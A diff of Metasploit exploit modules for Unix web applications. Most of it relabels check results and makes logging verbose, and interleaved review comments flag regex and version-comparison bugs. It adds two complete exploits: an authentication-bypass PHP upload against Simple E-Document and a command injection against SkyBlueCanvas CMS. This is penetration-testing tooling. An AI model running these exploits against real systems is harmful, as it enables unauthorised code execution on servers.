@@ -73,15 +73,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.body =~ /cannot be resolved to an ip address/) - print_status("This system appears to be vulnerable") - return Exploit::CheckCode::Vulnerable + vprint_status("This system appears to be vulnerable") + return Exploit::CheckCode::Appears end if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) - print_status("This system appears to be patched") + vprint_status("This system appears to be patched") end - print_status("This system is not exploitable") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ce2340c4be..ae6cfbfe69 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote login if not @session_id or @session_id.empty? - print_error "#{peer} - Authentication failed" + vprint_error "#{peer} - Authentication failed" return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 59f4fc4945..bfabfaf7ea 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end 
@@ -69,11 +69,11 @@ class Metasploit3 < Msf::Exploit::Remote version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || '' if not version.empty? and version =~ /1\.1\.7/ - print_status("#{peer} - Version found: #{version}") - return Exploit::CheckCode::Vulnerable + vprint_status("#{peer} - Version found: #{version}") + return Exploit::CheckCode::Appears end - Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/instantcms_exec.rb b/modules/exploits/unix/webapp/instantcms_exec.rb index 6eca2fc931..570fb63323 100644 --- a/modules/exploits/unix/webapp/instantcms_exec.rb +++ b/modules/exploits/unix/webapp/instantcms_exec.rb @@ -52,18 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res - if res.body.match(/Build Date/) - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe - end - else - return Exploit::CheckCode::Unknown + if res and res.body.match(/Build Date/) + return Exploit::CheckCode::Vulnerable end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - return Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index d4aa24d0ab..8be862ed3b 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote version = ( get_version || '').to_s if (version.match(%r{1\.5\.7\.1[0-4]?})) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index e24b7604ed..6149c8cdfd 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb 
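Review bot: instantcms_exec now returns `Exploit::CheckCode::Vulnerable` from a bare `res.body.match(/Build Date/)`, which only shows the application is present, while the same commit downgrades equivalent banner and version matches (joomla_comjce_imgmanager on this same line, openx_banner_edit, sphpblog_file_upload) to `Appears`; `return Exploit::CheckCode::Appears` would be consistent. Dropping the `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout` clause also means those exceptions now leave `check` instead of yielding Unknown, unless the caller or the HTTP mixin handles them; the method's opening is outside the hunk, so I cannot see whether another handler remains.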
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ - print_status("#{peer} - Joomla Media Manager Found but authentication required") + vprint_status("#{peer} - Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /
normalize_uri(target_uri.path, "index.php") }) if not res - print_error("#{peer} - Request timed out") + vprint_error("#{peer} - Request timed out") return Exploit::CheckCode::Unknown elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/ version = "#{$1}" print_good("#{peer} - Found version: #{version}") if version >= "0.9.2" and version <= "0.9.2.1306" - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Appears end end - Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 29f54e4d8f..09bb854bec 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 791d0653ee..913641b07b 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Checking target") + vprint_status("Checking target") res = send_request_raw({ 'method' => 'GET', 'uri' => uri diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index ee122919cf..4bba1a2ef0 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb 
@@ -164,16 +164,16 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = select_target(banner, version) if mytarget.nil? - print_error("No matching target") + vprint_error("No matching target") return CheckCode::Unknown end if alert.nil? - print_error("At least one ALERT is needed in order to exploit") + vprint_error("At least one ALERT is needed in order to exploit") return CheckCode::Detected end - return CheckCode::Vulnerable + return CheckCode::Appears end def exploit diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 2a1d2c68bf..0295f0f7db 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 404 - print_error("Remote host does not have Graph Explorer installed.") + vprint_error("Remote host does not have Graph Explorer installed.") elsif res and res.body =~ /Your session has timed out/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index 6f65bc56a8..3672d2fb00 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -83,14 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote def check sig = rand_text_alpha(rand(10) + 5) #The string to check - print_status("#{peer} - Looking for signature '#{sig}'...") + vprint_status("#{peer} - Looking for signature '#{sig}'...") res = remote_exe("echo #{sig}") if res and res.body =~ /#{sig}/ - print_status("#{peer} - Signature '#{sig}' found.") + vprint_status("#{peer} - Signature '#{sig}' found.") return Exploit::CheckCode::Vulnerable else - print_status("#{peer} - Signature not found") + vprint_status("#{peer} - Signature not found") return Exploit::CheckCode::Safe end end 
diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index 65916cc599..0669cfdd87 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -77,13 +77,13 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - print_error("#{peer} - No ofc_upload_image.php found") + vprint_error("#{peer} - No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ vprint_status("#{peer} - Found ofc_upload_image.php") - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a4c76f8a81..a795414f59 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -69,10 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version < "4.1.2" - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index dfffcc4287..243b6b31ff 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb 
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" # Check version - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component - print_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("#{peer} - Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /Saving your image to/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 6db0c66ab7..5e24801888 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote def check return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") res = execute_command("echo #{fingerprint}") if res and res.body =~ /align=center>#{fingerprint}/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 17e82bfdec..a0eac8db57 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb 
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe if (vers[0] > 2) return Exploit::CheckCode::Safe if (vers[1] > 8) return Exploit::CheckCode::Safe if (vers[0] == 2 && vers[1] == 8 && vers[2] >= 2) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 1f31db9b3d..eb1393d33a 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -79,14 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 3f3b786b33..b39281daca 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote if response.code == 200 return Exploit::CheckCode::Detected end - print_error("Server responded with #{response.code}") + vprint_error("Server responded with #{response.code}") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 49ca4bd598..cdb3f7c30a 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb 
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Checking uri #{rhost+tpath+uri}") response = send_request_raw({ 'uri' => tpath+uri}) return Exploit::CheckCode::Detected if response.code == 200 - print_error("Server responded with #{response.code}") + vprint_error("Server responded with #{response.code}") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Unknown diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb index fa17f8521d..d0ffa55992 100644 --- a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb +++ b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb @@ -183,14 +183,14 @@ class Metasploit3 < Msf::Exploit::Remote def check res = wordpress_and_online? unless res - print_error("#{peer} does not seeem to be Wordpress site") + vprint_error("#{peer} does not seeem to be Wordpress site") return Exploit::CheckCode::Unknown end if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/ version = $1 if version <= "0.9.2.8" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end @@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 713de00e18..c9e2c4f6a2 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end 
diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb new file mode 100644 index 0000000000..59a13ca1d0 --- /dev/null +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb 
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Simple E-Document Arbitrary File Upload",
+ 'Description' => %q{
+ This module exploits a file upload vulnerability found in Simple
+ E-Document versions 3.0 to 3.1. Attackers can bypass authentication and
+ abuse the upload feature in order to upload malicious PHP files which
+ results in arbitrary remote code execution as the web server user. File
+ uploads are disabled by default.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'vinicius777[at]gmail.com', # Auth bypass discovery and PoC, kinda
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'References' =>
+ [
+ # This EDB uses SQLI for auth bypass which isn't needed.
+ # Sending "Cookie: access=3" with all requests is all
+ # that's needed for auth bypass.
+ ['EDB', '31142']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ # Arbitrary big number. The payload gets sent as an HTTP
+ # response body, so really it's unlimited
+ 'Space' => 262144 # 256k
+ },
+ 'Arch' => ARCH_PHP,
+ 'Platform' => 'php',
+ 'Targets' =>
+ [
+ # Tested on Simple E-Document versions 3.0 and 3.1
+ [ 'Generic (PHP Payload)', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Jan 23 2014',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/'])
+ ], self.class)
+ end
+
+ #
+ # Checks if target allows file uploads
+ #
+ def check
+ res = send_request_raw({
+ 'uri' => normalize_uri(target_uri.path, 'upload.php'),
+ 'cookie' => 'access=3'
+ })
+
+ unless res
+ vprint_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ end
+
+ if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/
+ vprint_error("#{peer} - File uploads are disabled")
+ return Exploit::CheckCode::Safe
+ end
+
+ if res.body and res.body.to_s =~ /Upload File/
+ return Exploit::CheckCode::Appears
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ #
+ # Uploads our malicious file
+ #
+ def upload
+ @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
+ php = ""
+
+ data = Rex::MIME::Message.new
+ data.add_part('upload', nil, nil, 'form-data; name="op1"')
+ data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
+ post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
+
+ print_status("#{peer} - Uploading malicious file...")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'upload.php'),
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'cookie' => 'access=3',
+ 'data' => post_data,
+ 'vars_get' => {
+ 'op' => 'newin'
+ }
+ })
+
+ fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res
+ fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/)
+
+ print_good("#{peer} - Payload uploaded successfully.")
+ register_files_for_cleanup(@fname)
+
+ if res.body.to_s =~ /
folder to use: .+#{target_uri.path}\/?(.+)
/
+ @upload_path = normalize_uri(target_uri.path, "#{$1}")
+ print_good("#{peer} - Found upload path #{@upload_path}")
+ else
+ @upload_path = normalize_uri(target_uri.path, 'in')
+ print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'")
+ end
+ end
+
+ #
+ # Executes our uploaded malicious file
+ #
+ def exec
+ print_status("#{peer} - Executing #{@fname}...")
+ res = send_request_raw({
+ 'uri' => normalize_uri(@upload_path, @fname),
+ 'cookie' => 'access=3'
+ })
+ if res and res.code == 404
+ fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}")
+ end
+ end
+
+ #
+ # Just upload and execute
+ #
+ def exploit
+ upload
+ exec
+ end
+end
diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb
new file mode 100644
index 0000000000..6a9f3d4db2
--- /dev/null
+++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb
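Review bot: `target_uri.path` is interpolated unescaped into the upload-path regex in `upload` (the `folder to use:` pattern), so a TARGETURI containing regex metacharacters such as `.`, `+` or `(` alters or breaks the match and the code silently falls back to the `'in'` directory; `#{Regexp.escape(target_uri.path)}` is the intended interpolation. The capture is then read through `"#{$1}"`, which `Regexp.last_match(1)` or a named group would express more clearly. In `check`, `res.body and res.body.to_s =~ ...` is redundant since `to_s` already turns a nil body into `""`. In `exec`, a nil `res` (timeout) produces no message at all, whereas `upload` handles the same condition with `fail_with(Failure::Unknown, ...)`.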
@@ -0,0 +1,94 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'SkyBlueCanvas CMS Remote Code Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability + in SkyBlueCanvas CMS version 1.1 r248-03 and below. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Scott Parish', # Vulnerability discovery and exploit + 'xistence ' # Metasploit Module + ], + 'References' => + [ + ['CVE', '2014-1683'], + ['OSVDB', '102586'], + ['BID', '65129'], + ['EDB', '31183'], + ['URL', 'http://packetstormsecurity.com/files/124948/SkyBlueCanvas-CMS-1.1-r248-03-Command-Injection.html'] + ], + 'Privileged' => false, + 'Payload' => + { + # Arbitrary big number. The payload gets sent as an HTTP + # response body, so really it's unlimited + 'Space' => 262144, # 256k + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby bash telnet python' + } + }, + 'Platform' => %w{ unix }, + 'Targets' => + [ + ['SkyBlueCanvas 1.1 r248', {}] + ], + 'Arch' => ARCH_CMD, + 'DisclosureDate' => 'Jan 28 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]), + ],self.class) + end + + def check + uri = normalize_uri(target_uri.path.to_s, "index.php") + + res = send_request_raw('uri' => uri) + + if res and res.body =~ /[1.1 r248]/ + vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + uri = normalize_uri(target_uri.path.to_s, "index.php") + + send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 
'vars_get' => { 'pid' => '4' }, + 'vars_post' => + { + 'cid' => '3', + 'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};", + 'email' => rand_text_alphanumeric(10), + 'subject' => rand_text_alphanumeric(10), + 'message' => rand_text_alphanumeric(10), + 'action' => 'Send' + } + }) + end +end diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 92728f82a2..555fe9b6e0 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -61,13 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/) ver = [ $1.to_i, $2.to_i, $3.to_i ] - print_status("Simple PHP Blog #{ver.join('.')}") + vprint_status("Simple PHP Blog #{ver.join('.')}") if (ver[0] == 0 and ver[1] < 5) if (ver[1] == 4 and ver[2] > 0) return Exploit::CheckCode::Safe end - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end end diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index e7e821bf1c..0333f6ad1b 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("SPIP Version detected: #{version}") if version =~ /^2\.0/ and version < "2.0.21" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif version =~ /^2\.1/ and version < "2.1.16" return Exploit::CheckCode::Appears elsif version =~ /^3\.0/ and version < "3.0.3" diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb index 632ad5f357..fd6fe00363 100644 --- a/modules/exploits/unix/webapp/squash_yaml_exec.rb +++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb 
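Review bot: The version test in the new skybluecanvas_exec.rb `check` is `res.body =~ /[1.1 r248]/`, which is a character class rather than a literal: it matches any page containing a single `1`, `.`, space, `r`, `2`, `4` or `8`, so almost any response is reported as `Appears`. It should be an escaped literal, `if res and res.body =~ /1\.1 r248/`. The header comment's `http//metasploit.com/download` is also missing its colon.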
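Review bot: The new `Appears` return in spip_connect_exec.rb is gated by `version < "2.0.21"`, which compares strings lexicographically, so a version such as `2.0.9` sorts after `2.0.21` and is reported as not affected; the same applies to the `2.1.16` and `3.0.3` comparisons in this hunk. Comparing `Gem::Version.new(version) < Gem::Version.new("2.0.21")` gives numeric ordering with no new dependency. The enclosing `check` method starts before and ends after this hunk.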
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 })
 if response.code == 422
- print_status("Got HTTP 422 result, target may be vulnerable")
+ vprint_status("Got HTTP 422 result, target may be vulnerable")
 return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
index 2322a13a9d..6d1469c346 100644
--- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 return Exploit::CheckCode::Safe if (ver2 > 8)
 return Exploit::CheckCode::Safe if (ver2 == 8 and ver3 > 0)
 end
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
index 90757d4519..7aa18c42ea 100644
--- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 http_fingerprint({ :response => res }) # check method
 if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb
index 09abcf49e0..133b26b8a0 100644
--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
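Review bot: In squash_yaml_exec.rb `check` dereferences `response.code` with no nil guard, while sibling modules in this same commit treat a nil response as a timeout (`return Exploit::CheckCode::Unknown`); a connection failure here raises `NoMethodError` instead of returning a check code. A guard before the comparison, `return Exploit::CheckCode::Unknown unless response`, brings it in line. The enclosing method starts before this hunk.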
@@ -62,37 +62,37 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(datastore['URI']) target_code = 200 - print_status "Attempting to POST to #{uri}" + vprint_status "Attempting to POST to #{uri}" response = send_request_cgi({'uri' => uri, 'method' => 'POST'}) unless defined? response - print_error 'Server did not respond to HTTP POST request' - return Exploit::CheckCode::Safe + vprint_error 'Server did not respond to HTTP POST request' + return Exploit::CheckCode::Unknown end code = response.code unless code == target_code - print_error "Expected HTTP code #{target_code}, but got #{code}." + vprint_error "Expected HTTP code #{target_code}, but got #{code}." return Exploit::CheckCode::Safe end - print_status "We received the expected HTTP code #{target_code}" + vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue cookies = response.headers['Set-Cookie'] # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX - print_status "We were successfully sent a PHPSESSID of '#{$1}'" + vprint_status "We were successfully sent a PHPSESSID of '#{$1}'" else - print_error 'The server did not send us the cookie we were looking for' + vprint_error 'The server did not send us the cookie we were looking for' return Exploit::CheckCode::Safe end # Okay, at this point we're just being silly and hackish. unless response.body =~ /langChoice/ - print_error 'The page does not appear to contain a langChoice field' + vprint_error 'The page does not appear to contain a langChoice field' return Exploit::CheckCode::Safe end 
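Review bot: The new `vprint_error`/`Unknown` branch in trixbox_langchoice.rb is unreachable, because `defined? response` is always truthy for a local that was assigned on the previous line, even when `send_request_cgi` returned nil; a timeout then falls through to `response.code` and raises. The test should be `unless response`, and the later `if defined? cookies and cookies =~ PHPSESSID_REGEX` has the same shape and can simply be `if cookies and cookies =~ PHPSESSID_REGEX`. The enclosing `check` method continues past this hunk.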
